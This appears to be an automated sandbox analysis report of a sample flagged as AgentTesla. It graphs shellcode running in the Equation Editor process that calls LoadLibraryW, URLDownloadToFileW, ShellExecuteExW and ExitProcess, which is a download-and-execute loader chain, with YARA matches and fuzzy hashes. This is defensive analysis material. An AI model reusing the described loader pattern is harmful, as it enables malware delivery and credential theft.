                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.988786427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.988786427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:21.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:59.5%
                                                                  Total number of Nodes:168
                                                                  Total number of Limit Nodes:7
                                                                  execution_graph 537 3570564 GetPEB 538 3570572 537->538 614 35701d2 615 35701ec 614->615 618 35703a2 ExitProcess 615->618 641 35703bb 618->641 622 35703c8 623 3570410 622->623 627 35703e4 622->627 683 35703fe 622->683 625 3570477 11 API calls 623->625 626 3570464 625->626 628 3570488 URLDownloadToFileW 626->628 630 35704de 8 API calls 626->630 627->623 627->626 701 3570448 627->701 631 3570528 5 API calls 628->631 630->628 633 3570518 631->633 634 357053f 3 API calls 633->634 635 357052f 634->635 636 357053e ShellExecuteExW 635->636 638 3570390 635->638 637 357055d ExitProcess 636->637 639 3570551 637->639 639->638 640 3570560 ExitProcess 639->640 642 35703c1 641->642 643 35703d7 24 API calls 642->643 644 35703c8 643->644 645 3570410 644->645 646 35703fe 21 API calls 644->646 650 35703e4 644->650 647 3570477 11 API calls 645->647 646->650 648 3570464 647->648 649 3570488 URLDownloadToFileW 648->649 652 35704de 8 API calls 648->652 653 3570528 5 API calls 649->653 650->645 650->648 654 3570448 18 API calls 650->654 652->649 655 3570518 653->655 654->645 656 357053f 3 API calls 655->656 657 357052f 656->657 658 357053e ShellExecuteExW 657->658 660 35703ae 657->660 659 357055d ExitProcess 658->659 661 3570551 659->661 660->622 663 35703d7 660->663 661->660 662 3570560 ExitProcess 661->662 664 35703dd 663->664 665 35703fe 21 API calls 664->665 671 35703e4 665->671 666 3570477 11 API calls 667 3570464 666->667 668 3570488 URLDownloadToFileW 667->668 670 35704de 8 API calls 667->670 672 3570528 5 API calls 668->672 670->668 671->667 673 3570448 18 API calls 671->673 677 3570410 671->677 674 3570518 672->674 673->677 675 357053f 3 API calls 674->675 676 357052f 675->676 678 357053e ShellExecuteExW 676->678 680 3570595 676->680 677->666 679 357055d ExitProcess 678->679 681 3570551 679->681 680->622 681->680 682 3570560 ExitProcess 681->682 684 3570401 683->684 685 3570448 18 API calls 684->685 686 3570410 685->686 687 3570477 11 API calls 686->687 688 3570464 687->688 689 3570488 URLDownloadToFileW 688->689 691 35704de 8 API calls 688->691 692 3570528 5 API calls 689->692 691->689 693 3570518 692->693 694 357053f 3 API calls 693->694 695 357052f 694->695 696 357053e ShellExecuteExW 695->696 698 3570595 695->698 697 357055d ExitProcess 696->697 699 3570551 697->699 698->627 699->698 700 3570560 ExitProcess 699->700 702 357044a 701->702 703 357045d 15 API calls 702->703 704 357044f 703->704 705 3570477 11 API calls 704->705 706 3570464 705->706 707 3570488 URLDownloadToFileW 706->707 709 35704de 8 API calls 706->709 710 3570528 5 API calls 707->710 709->707 711 3570518 710->711 712 357053f 3 API calls 711->712 713 357052f 712->713 714 357053e ShellExecuteExW 713->714 716 3570595 713->716 715 357055d ExitProcess 714->715 717 3570551 715->717 716->623 717->716 718 3570560 ExitProcess 717->718 719 3570000 721 357000e 719->721 720 3570024 721->720 724 3570250 721->724 725 357025b 724->725 726 35703a2 31 API calls 725->726 727 35702d2 726->727 736 35702ed 737 357032a 736->737 738 35703a2 31 API calls 737->738 739 3570390 738->739 539 3570448 540 357044a 539->540 557 357045d LoadLibraryW 540->557 545 3570488 URLDownloadToFileW 587 3570528 545->587 552 357053e ShellExecuteExW 602 357055d 552->602 554 3570595 555 3570551 555->554 556 3570560 ExitProcess 555->556 558 357045f 557->558 559 3570477 11 API calls 558->559 560 3570464 559->560 561 3570488 URLDownloadToFileW 560->561 563 35704de 8 API calls 560->563 564 3570528 5 API calls 561->564 563->561 565 3570518 564->565 566 357053f 3 API calls 565->566 567 357052f 566->567 568 357053e ShellExecuteExW 567->568 570 357044f 567->570 569 357055d ExitProcess 568->569 571 3570551 569->571 573 3570477 570->573 571->570 572 3570560 ExitProcess 571->572 574 357047a 573->574 575 3570488 URLDownloadToFileW 574->575 576 35704de 8 API calls 574->576 578 3570528 5 API calls 575->578 576->575 579 3570518 578->579 580 357053f 3 API calls 579->580 581 357052f 580->581 582 357053e ShellExecuteExW 581->582 584 3570464 581->584 583 357055d ExitProcess 582->583 585 3570551 583->585 584->545 604 35704de URLDownloadToFileW 584->604 585->584 586 3570560 ExitProcess 585->586 588 357052a 587->588 589 357053f 3 API calls 588->589 590 357052f 588->590 589->590 591 357053e ShellExecuteExW 590->591 593 3570518 590->593 592 357055d ExitProcess 591->592 594 3570551 592->594 596 357053f 593->596 594->593 595 3570560 ExitProcess 594->595 597 3570542 ShellExecuteExW 596->597 598 357055d ExitProcess 597->598 599 3570551 597->599 598->599 600 357052f 599->600 601 3570560 ExitProcess 599->601 600->552 600->554 603 3570560 ExitProcess 602->603 605 3570518 604->605 606 3570528 5 API calls 604->606 607 357053f 3 API calls 605->607 606->605 608 357052f 607->608 609 357053e ShellExecuteExW 608->609 611 3570595 608->611 610 357055d ExitProcess 609->610 612 3570551 610->612 611->545 612->611 613 3570560 ExitProcess 612->613

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_035703D7 3 Function_035704DE 0->3 4 Function_0357055D 0->4 6 Function_035705DD 0->6 14 Function_03570448 0->14 15 Function_03570477 0->15 17 Function_0357053F 0->17 18 Function_035703FE 0->18 25 Function_03570528 0->25 1 Function_035701D2 22 Function_035703A2 1->22 2 Function_03570250 2->22 3->4 3->17 3->25 5 Function_0357045D 5->3 5->4 5->15 5->17 5->25 7 Function_035700C7 8 Function_03570000 8->2 9 Function_03570340 9->22 10 Function_0357034F 10->22 11 Function_0357030D 12 Function_0357058C 13 Function_0357018A 14->3 14->4 14->5 14->15 14->17 14->25 15->3 15->4 15->17 15->25 16 Function_035700B6 17->4 18->3 18->4 18->14 18->15 18->17 18->25 19 Function_035703BB 19->0 19->3 19->4 19->6 19->14 19->15 19->17 19->18 19->25 20 Function_0357017A 21 Function_03570564 21->12 22->0 22->3 22->4 22->14 22->15 22->17 22->18 22->19 22->25 23 Function_035702EF 24 Function_035702ED 24->22 25->4 25->17

                                                                  Executed Functions

                                                                  Function 0357045D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 357045d-3570469 LoadLibraryW call 3570477 4 357046a-35704d8 call 35704de 0->4 5 35704d9 0->5 6 35704da-3570535 URLDownloadToFileW call 3570528 call 357053f 4->6 5->6 14 3570537-357053c 6->14 15 357059c-35705a0 6->15 18 3570595 14->18 19 357053e-3570554 ShellExecuteExW call 357055d 14->19 16 35705a2 15->16 17 35705cb-35705d4 15->17 22 35705a6 16->22 20 3570598-357059b 17->20 18->20 19->22 33 3570556 19->33 24 35705d6 20->24 25 357059d-35705a0 20->25 26 35705ae-35705b2 22->26 27 35705a8-35705ac 22->27 28 35705d9-35705da 24->28 25->16 25->17 31 35705c7-35705c9 26->31 32 35705b4-35705b8 26->32 27->26 30 35705ba-35705c1 27->30 34 35705c5 30->34 35 35705c3 30->35 31->28 32->30 32->31 33->31 36 3570558-3570562 ExitProcess 33->36 34->17 35->31
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(0357044F), ref: 0357045D
                                                                    • Part of subcall function 03570477: URLDownloadToFileW.URLMON(00000000,03570488,?,00000000,00000000), ref: 035704E0
                                                                    • Part of subcall function 03570477: ShellExecuteExW.SHELL32(0000003C), ref: 0357054A
                                                                    • Part of subcall function 03570477: ExitProcess.KERNEL32(00000000), ref: 03570562
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                  • String ID: <
                                                                  • API String ID: 2508257586-4251816714
                                                                  • Opcode ID: a6df76566a82557240c3b00d6012cf00407fe314c59ea0100305b4764b045532
                                                                  • Instruction ID: 2b0c1483418050ff9838a7c7cfa1112920727153116f9c75fd91dcb5768d1dd6
                                                                  • Opcode Fuzzy Hash: a6df76566a82557240c3b00d6012cf00407fe314c59ea0100305b4764b045532
                                                                  • Instruction Fuzzy Hash: E23188A280D3C52FCB239730AC69655BFA06F67104F5989CED4C24A4E3E6689506C753
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 035703D7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154filenetworkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 39 35703d7-35703e5 call 35705dd call 35703fe 44 3570457-357045b 39->44 45 35703e7-35703ec 39->45 46 357045f-3570469 call 3570477 44->46 45->44 47 35703ee 45->47 54 357046a-35704d8 call 35704de 46->54 55 35704d9 46->55 47->46 49 35703f0-35703f4 47->49 51 35703f6 49->51 52 3570449-3570454 49->52 51->54 56 35703f8-3570447 call 3570448 51->56 52->44 57 35704da-3570535 URLDownloadToFileW call 3570528 call 357053f 54->57 55->57 56->52 70 3570537-357053c 57->70 71 357059c-35705a0 57->71 76 3570595 70->76 77 357053e-3570554 ShellExecuteExW call 357055d 70->77 74 35705a2 71->74 75 35705cb-35705d4 71->75 81 35705a6 74->81 79 3570598-357059b 75->79 76->79 77->81 92 3570556 77->92 83 35705d6 79->83 84 357059d-35705a0 79->84 85 35705ae-35705b2 81->85 86 35705a8-35705ac 81->86 87 35705d9-35705da 83->87 84->74 84->75 90 35705c7-35705c9 85->90 91 35705b4-35705b8 85->91 86->85 89 35705ba-35705c1 86->89 93 35705c5 89->93 94 35705c3 89->94 90->87 91->89 91->90 92->90 95 3570558-3570562 ExitProcess 92->95 93->75 94->90
                                                                  APIs
                                                                  • URLDownloadToFileW.URLMON(00000000,03570488,?,00000000,00000000), ref: 035704E0
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0357054A
                                                                  • ExitProcess.KERNEL32(00000000), ref: 03570562
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                  • String ID: <
                                                                  • API String ID: 3584569557-4251816714
                                                                  • Opcode ID: 226cad51b4367aa1668ecbbe660081bee8136ff4f0bd55dc885157ce9f3a002f
                                                                  • Instruction ID: a2df1ea054c5e4c50eb167ed7f298a56ac921621d274768b1794cf2442b15eb0
                                                                  • Opcode Fuzzy Hash: 226cad51b4367aa1668ecbbe660081bee8136ff4f0bd55dc885157ce9f3a002f
                                                                  • Instruction Fuzzy Hash: F851B8A680D3C52FC722D730BD69659BFA17E63000B5D8ACED4C60B4F3E6689506C357
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03570477 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 98 3570477-3570482 100 3570488-3570535 URLDownloadToFileW call 3570528 call 357053f 98->100 101 3570483 call 35704de 98->101 108 3570537-357053c 100->108 109 357059c-35705a0 100->109 101->100 112 3570595 108->112 113 357053e-3570554 ShellExecuteExW call 357055d 108->113 110 35705a2 109->110 111 35705cb-35705d4 109->111 116 35705a6 110->116 114 3570598-357059b 111->114 112->114 113->116 127 3570556 113->127 118 35705d6 114->118 119 357059d-35705a0 114->119 120 35705ae-35705b2 116->120 121 35705a8-35705ac 116->121 122 35705d9-35705da 118->122 119->110 119->111 125 35705c7-35705c9 120->125 126 35705b4-35705b8 120->126 121->120 124 35705ba-35705c1 121->124 128 35705c5 124->128 129 35705c3 124->129 125->122 126->124 126->125 127->125 130 3570558-3570562 ExitProcess 127->130 128->111 129->125
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                  • String ID: <
                                                                  • API String ID: 3584569557-4251816714
                                                                  • Opcode ID: 29f8aa4a882e4ed94abee6ed0e7777e9a7669bec79a895998b46495f9dd233cd
                                                                  • Instruction ID: e77546d61d09765ebfb52ce5522c783ae795c5772aa1b0ece29917f9e734f97e
                                                                  • Opcode Fuzzy Hash: 29f8aa4a882e4ed94abee6ed0e7777e9a7669bec79a895998b46495f9dd233cd
                                                                  • Instruction Fuzzy Hash: 5D3147E280D3C55FCB239730ACADA55BFA06F67104F5989CED4C64B8E3E6688406C753
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 035704DE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44filenetworkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 133 35704de-3570511 URLDownloadToFileW 134 3570518-3570535 call 357053f 133->134 135 3570513 call 3570528 133->135 139 3570537-357053c 134->139 140 357059c-35705a0 134->140 135->134 143 3570595 139->143 144 357053e-3570554 ShellExecuteExW call 357055d 139->144 141 35705a2 140->141 142 35705cb-35705d4 140->142 147 35705a6 141->147 145 3570598-357059b 142->145 143->145 144->147 158 3570556 144->158 149 35705d6 145->149 150 357059d-35705a0 145->150 151 35705ae-35705b2 147->151 152 35705a8-35705ac 147->152 153 35705d9-35705da 149->153 150->141 150->142 156 35705c7-35705c9 151->156 157 35705b4-35705b8 151->157 152->151 155 35705ba-35705c1 152->155 159 35705c5 155->159 160 35705c3 155->160 156->153 157->155 157->156 158->156 161 3570558-3570562 ExitProcess 158->161 159->142 160->156
                                                                  APIs
                                                                  • URLDownloadToFileW.URLMON(00000000,03570488,?,00000000,00000000), ref: 035704E0
                                                                    • Part of subcall function 03570528: ShellExecuteExW.SHELL32(0000003C), ref: 0357054A
                                                                    • Part of subcall function 03570528: ExitProcess.KERNEL32(00000000), ref: 03570562
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                  • String ID: <
                                                                  • API String ID: 3584569557-4251816714
                                                                  • Opcode ID: e870fd5df6ea5499a527785c358ffa776c1895a326771cb5f84b216e00082b94
                                                                  • Instruction ID: 8c87c36d3513f2f0fc78aa246457ff86358a25a39729be249073c6049661e440
                                                                  • Opcode Fuzzy Hash: e870fd5df6ea5499a527785c358ffa776c1895a326771cb5f84b216e00082b94
                                                                  • Instruction Fuzzy Hash: 640126E640D3845AC722E774FC8CBAABFE0BF85280F14089990958B0F3E9348501CB06
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03570528 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 164 3570528-357052a 166 357052f-3570535 164->166 167 357052a call 357053f 164->167 168 3570537-357053c 166->168 169 357059c-35705a0 166->169 167->166 172 3570595 168->172 173 357053e-3570554 ShellExecuteExW call 357055d 168->173 170 35705a2 169->170 171 35705cb-35705d4 169->171 176 35705a6 170->176 174 3570598-357059b 171->174 172->174 173->176 187 3570556 173->187 178 35705d6 174->178 179 357059d-35705a0 174->179 180 35705ae-35705b2 176->180 181 35705a8-35705ac 176->181 182 35705d9-35705da 178->182 179->170 179->171 185 35705c7-35705c9 180->185 186 35705b4-35705b8 180->186 181->180 184 35705ba-35705c1 181->184 188 35705c5 184->188 189 35705c3 184->189 185->182 186->184 186->185 187->185 190 3570558-3570562 ExitProcess 187->190 188->171 189->185
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: ExecuteExitProcessShell
                                                                  • String ID:
                                                                  • API String ID: 1124553745-0
                                                                  • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                                                  • Instruction ID: a84aa7b402f4cd3ee5b3884cde57e804ad9c177b8c157c21777f5fec2ba28899
                                                                  • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                                                  • Instruction Fuzzy Hash: F50126D940A34764CA70F738F4886BBEBD1BF423D0BDC8557A8920B4F4D62495C38619
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0357053F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 193 357053f-357054a ShellExecuteExW 195 3570551-3570554 193->195 196 357054c call 357055d 193->196 198 35705a6 195->198 199 3570556 195->199 196->195 202 35705ae-35705b2 198->202 203 35705a8-35705ac 198->203 200 35705c7-35705c9 199->200 201 3570558-3570562 ExitProcess 199->201 204 35705d9-35705da 200->204 202->200 207 35705b4-35705b8 202->207 203->202 206 35705ba-35705c1 203->206 208 35705c5 206->208 209 35705c3 206->209 207->200 207->206 210 35705cb-35705d4 208->210 209->200 213 35705d6 210->213 214 357059d-35705a0 210->214 213->204 214->210 215 35705a2 214->215 215->198
                                                                  APIs
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0357054A
                                                                    • Part of subcall function 0357055D: ExitProcess.KERNEL32(00000000), ref: 03570562
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: ExecuteExitProcessShell
                                                                  • String ID:
                                                                  • API String ID: 1124553745-0
                                                                  • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                                                  • Instruction ID: f817e16514bd599eaed25d2b09540613d848cdb0a04e87d15efeae3692bee16b
                                                                  • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                                                  • Instruction Fuzzy Hash: 8EF022CA80635751CB30F278F848BBBABD5BF923E0FCC88439882074F5D52891C38629
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0357055D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 216 357055d-3570562 ExitProcess
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000), ref: 03570562
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03570564 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 218 3570564-357056f GetPEB 219 3570572-3570583 call 357058c 218->219 222 3570585-3570589 219->222
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                  • Instruction ID: 51843f81a51810e95d93d8590a10c38f9841369d91335462bd7dc47941e8b357
                                                                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                  • Instruction Fuzzy Hash: C4D05E712015028FC304DB04E980E12F3BAFFC4290B18C264D4004B76AC330E891CA90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 035703A2 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 223 35703a2-35703c1 ExitProcess call 35703bb 226 35703c8-35703c9 223->226 227 35703c3 call 35703d7 223->227 228 357041c-3570447 226->228 229 35703cc-35703d4 226->229 227->226 236 3570449-3570454 228->236 235 35703d6-35703dd 229->235 229->236 239 35703e4-35703e5 235->239 240 35703df call 35703fe 235->240 241 3570457-357045b 236->241 239->241 242 35703e7-35703ec 239->242 240->239 243 357045f-3570469 call 3570477 241->243 242->241 244 35703ee 242->244 249 357046a-35704d8 call 35704de 243->249 250 35704d9 243->250 244->243 246 35703f0-35703f4 244->246 246->236 248 35703f6 246->248 248->249 251 35703f8-3570419 call 3570448 248->251 252 35704da-3570535 URLDownloadToFileW call 3570528 call 357053f 249->252 250->252 251->228 263 3570537-357053c 252->263 264 357059c-35705a0 252->264 267 3570595 263->267 268 357053e-3570554 ShellExecuteExW call 357055d 263->268 265 35705a2 264->265 266 35705cb-35705d4 264->266 271 35705a6 265->271 269 3570598-357059b 266->269 267->269 268->271 282 3570556 268->282 273 35705d6 269->273 274 357059d-35705a0 269->274 275 35705ae-35705b2 271->275 276 35705a8-35705ac 271->276 277 35705d9-35705da 273->277 274->265 274->266 280 35705c7-35705c9 275->280 281 35705b4-35705b8 275->281 276->275 279 35705ba-35705c1 276->279 283 35705c5 279->283 284 35705c3 279->284 280->277 281->279 281->280 282->280 285 3570558-3570562 ExitProcess 282->285 283->266 284->280
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(03570390), ref: 035703A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: aab68a46840adf85b3e6f76405d6c7c7b4b85acbc5c1b05220734da4a8a89cc3
                                                                  • Instruction ID: a79c88eb1b5566a97b658d36a6dc63808325b3527d8f9607b57e188de806c55e
                                                                  • Opcode Fuzzy Hash: aab68a46840adf85b3e6f76405d6c7c7b4b85acbc5c1b05220734da4a8a89cc3
                                                                  • Instruction Fuzzy Hash: B321F09680D7C15FD712DB707E69068FFA2B912400B4C86CBC5954B0F3E6A49A05D387
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 035701D2 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 288 35701d2-35701ea 289 3570230-357024f 288->289 290 35701ec-357022e 288->290 291 3570251-357025a 289->291 292 35702a9-3570381 289->292 290->289 293 357025b-35702a3 290->293 291->293 297 357032a-3570383 292->297 293->292 300 3570385 297->300 301 357038b call 35703a2 300->301 302 3570390-35703a8 301->302
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Q
                                                                  • API String ID: 0-3463352047
                                                                  • Opcode ID: 9ddf1b8c2a5132e8ec8b5e86eb16406208e0c3a91f572025799cc62a28a14f73
                                                                  • Instruction ID: 4a81bb230a922403ea6f7d0691bb27ffaac212e94d7ae6e66026c189a4816394
                                                                  • Opcode Fuzzy Hash: 9ddf1b8c2a5132e8ec8b5e86eb16406208e0c3a91f572025799cc62a28a14f73
                                                                  • Instruction Fuzzy Hash: AE31977390C7465FF70ACB38EDD92E9BBA5FB01300F1806BAD4454B6D2D7252609C2A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03570250 Relevance: .1, Instructions: 67COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 368 3570250-3570381 373 357032a-3570383 368->373 376 3570385 373->376 377 357038b call 35703a2 376->377 378 3570390-35703a8 377->378
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 7a3ee3a0547418907c89ace8b57057d19d5c6c3ae5e626ace9305c5c4f4dd620
                                                                  • Instruction ID: ce466515d3269f41f5f6ea383f7c3598fad3cf6150a63c26ccffa81746896b54
                                                                  • Opcode Fuzzy Hash: 7a3ee3a0547418907c89ace8b57057d19d5c6c3ae5e626ace9305c5c4f4dd620
                                                                  • Instruction Fuzzy Hash: E311E2B350C3425FF30ACA38EEE9AE5BB65F711314F5806BED40A4B5D2E76936098161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 035705DD Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 390 35705dd-35705f9 391 35705fb-35705fd 390->391 392 35705ff-3570616 391->392 393 357063c-357063e 391->393 394 3570635-357063a 392->394 395 3570618-3570633 392->395 396 3570641-3570645 393->396 394->391 395->396
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4ecb70320d2f7ec18826561254b1676e35e666a68c8be0f46cb10507c807d69
                                                                  • Instruction ID: 06e18793747d44aa93067aa1aed5d70121caf3acedadb94ef16d1a5110964120
                                                                  • Opcode Fuzzy Hash: a4ecb70320d2f7ec18826561254b1676e35e666a68c8be0f46cb10507c807d69
                                                                  • Instruction Fuzzy Hash: 06015E752041068FEB18CF19F890D3677E8FFD932531941AEE4058B3A2EA60E852C660
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0357034F Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 397 357034f-3570381 400 357032a-3570383 397->400 403 3570385 400->403 404 357038b call 35703a2 403->404 405 3570390-35703a8 404->405
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 32a65523c586632dded87b85dedc7da5baad02f92eefe8a1eb5dc5548217e26b
